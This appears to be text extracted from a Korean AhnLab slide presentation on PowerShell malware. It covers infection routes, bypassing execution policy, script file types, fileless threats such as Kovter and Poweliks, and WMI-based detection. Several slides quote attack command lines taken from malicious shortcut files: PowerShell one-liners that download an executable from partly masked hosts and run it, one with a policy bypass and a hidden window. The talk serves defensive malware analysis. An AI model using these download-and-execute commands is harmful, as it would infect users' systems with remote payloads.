  • 30. © AhnLab, Inc. All rights reserved. 30 주요 감염 경로 • 주요 감염 경로 Mail − 첨부 파일 혹은 Link icon Web Browser − Exploit Kit 이용 − Fileless 악성코드 감염에도 이용
  • 31. © AhnLab, Inc. All rights reserved. 31 감염 경로 • Mail -
  • 32. © AhnLab, Inc. All rights reserved. 32 PowerShell 실행 • 실행 권한 - DownloadFile명령의개별명령과스크립트실행테스트 -개별명령은실행되지만스크립트는정책상실행되지않음
  • 33. © AhnLab, Inc. All rights reserved. 33 PowerShell 실행 • Bypass PowerShell executionpolicies - * Source:https://technet.microsoft.com/en-us/library/ee176847.aspx
  • 34. © AhnLab, Inc. All rights reserved. 34 PowerShell 실행 • Bypass PowerShell executionpolicies - * Source:http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
  • 35. © AhnLab, Inc. All rights reserved. 35 기능 • Downloader혹은 Dropper - * Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
  • 37. © AhnLab, Inc. All rights reserved. 종류 종류 Office (DOC, DOCM, XLS, XLSM) Shortcut (LNK) PowerShell (PS1) Windows ScriptFile (WSF), HTML Application (HTA) Java Script /Visual Basic Script (JS, JSE, VBS, VBE, WSF, HTA)
  • 38. © AhnLab, Inc. All rights reserved. 38 Java Script - JS • JavaScript(JS) -
  • 39. © AhnLab, Inc. All rights reserved. 39 Visual Basic Script • VisualBasicScript(VBS) -
  • 40. © AhnLab, Inc. All rights reserved. 40 Windows Script File (WSF) • WSF(WindowsScriptFile) - 대부분JavaScript
  • 41. © AhnLab, Inc. All rights reserved. 41 Windows Script File (WSF) • WSF(WindowsScriptFile) -
  • 42. © AhnLab, Inc. All rights reserved. 42 HTMLApplication (HTA) • HTMLApplication(HTA) -대부분JavaScript
  • 43. © AhnLab, Inc. All rights reserved. 43 Office (DOC, DOCM, XLS, XLSM) • Macro 포함 문서 -
  • 44. © AhnLab, Inc. All rights reserved. 44 Shortcut (LNK) • LNK -
  • 45. © AhnLab, Inc. All rights reserved. 45 Shortcut (LNK) • Download - %WINDIR%System32WindowsPowerShellv1.0powershell.exe $cmd = 'Start-Process';$b = '%TEMP%tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
  • 46. © AhnLab, Inc. All rights reserved. 46 Shortcut (LNK) • Download - C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%Example.exe'); cmd /c '%APPDATA%Example.exe'
  • 47. © AhnLab, Inc. All rights reserved. 47 Shortcut (LNK) • Encoding - C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe powershell.exe -EncodedCommand UABvAHc………
  • 48. © AhnLab, Inc. All rights reserved. 48 PowerShell (PS1) • PowerShell -
  • 50. © AhnLab, Inc. All rights reserved. 50 Fileless • FilelessTechnique으로이용 -Poweliks * Source:https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
  • 51. © AhnLab, Inc. All rights reserved. 51 Fileless • FilelessTechnique으로이용 -Poweliks
  • 52. © AhnLab, Inc. All rights reserved. 52 Fileless 악성코드 • Kovter - Run항목읽을수없음
  • 53. © AhnLab, Inc. All rights reserved. 53 Fileless 악성코드 • Kovter -mshta.exe를통해Script실행
  • 54. © AhnLab, Inc. All rights reserved. 54 Fileless 악성코드 • Kovter -인코딩된데이터
  • 57. © AhnLab, Inc. All rights reserved. 57 Error • WindowsPowerShell작동 중지 - 갑자기WindowsPowerShell에러가발생할수있음
  • 58. © AhnLab, Inc. All rights reserved. 58 Response • WMI for Detectionand Response - * Source:https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
  • 59. © AhnLab, Inc. All rights reserved. 59 전망 • PowerShell의확장 - * Source:https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
  • 60. © AhnLab, Inc. All rights reserved. 전망 전망 JS, VBS 대체 ?! Obfuscation Cross-Platform
  • 61. © AhnLab, Inc. All rights reserved. 61 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
  • 62. © AhnLab, Inc. All rights reserved. 62 현재의 보안 문제 • Not reallya fair fight * source:http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
  • 63. © AhnLab, Inc. All rights reserved. 63 현재의 보안 문제 • 모두가 함께 해야 하는 보안 * source:http://www.security-marathon.be/?p=1786
  • 64. © AhnLab, Inc. All rights reserved. 64 Q&A email : minseok.cha@ahnlab.com / mstoned7@gmail.com http://xcoolcat7.tistory.com https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
  • 65. © AhnLab, Inc. All rights reserved. 65 Reference • Ryan Kazanciyan& Matt Hastings,‘InvestigatingPowerShellAttack’,2014 • Matt Graeber, ‘Abusing WindowsManagementInstrumentation(WMI) to Builda Persistent, Asyncronous,andFilelessBackdoor’,2015 • Santiago M.Pontiroli &F. Roberto Martinez, ‘TheTao of .NETand PowerShellMalwareAnalysis’,2015 • 김승훈/AhnLab,‘매크로 다운로더 분석’, 2016